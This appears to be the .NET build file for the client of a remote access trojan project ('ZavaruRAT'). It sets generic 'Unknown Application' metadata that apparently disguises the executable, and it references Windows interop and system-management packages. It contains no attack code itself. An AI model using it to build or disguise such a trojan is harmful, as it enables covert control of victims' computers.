<Project Sdk="Microsoft.NET.Sdk">

    <PropertyGroup>
        <OutputType>WinExe</OutputType>
        <TargetFramework>net7.0-windows</TargetFramework>
        <ImplicitUsings>enable</ImplicitUsings>
        <Nullable>enable</Nullable>
        <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
        <Company>Unknown Systems Ltd.</Company>
        <Product>Unknown Product</Product>
        <Description>Unknown</Description>
        <ProductName>Unknown Application</ProductName>
        <AssemblyName>Unknown Application</AssemblyName>
        <AssemblyTitle>Unknown Application</AssemblyTitle>
        <Title>Unknown Application</Title>
        <TargetName>Unknown Application</TargetName>
        <RootNamespace>Unknown Application</RootNamespace>
        <AssemblyVersion>1.0.2.3</AssemblyVersion>
        <FileVersion>1.0.2.3</FileVersion>
        <NeutralLanguage>en-US</NeutralLanguage>
    </PropertyGroup>

    <ItemGroup>
        <ProjectReference Include="..\ZavaruRAT.Shared\ZavaruRAT.Shared.csproj" />
    </ItemGroup>

    <ItemGroup>
        <PackageReference Include="Microsoft.Windows.CsWin32" Version="0.2.164-beta">
            <PrivateAssets>all</PrivateAssets>
        </PackageReference>
        <PackageReference Include="System.Drawing.Common" Version="7.0.0" />
        <PackageReference Include="System.Management" Version="7.0.0" />
    </ItemGroup>

</Project>
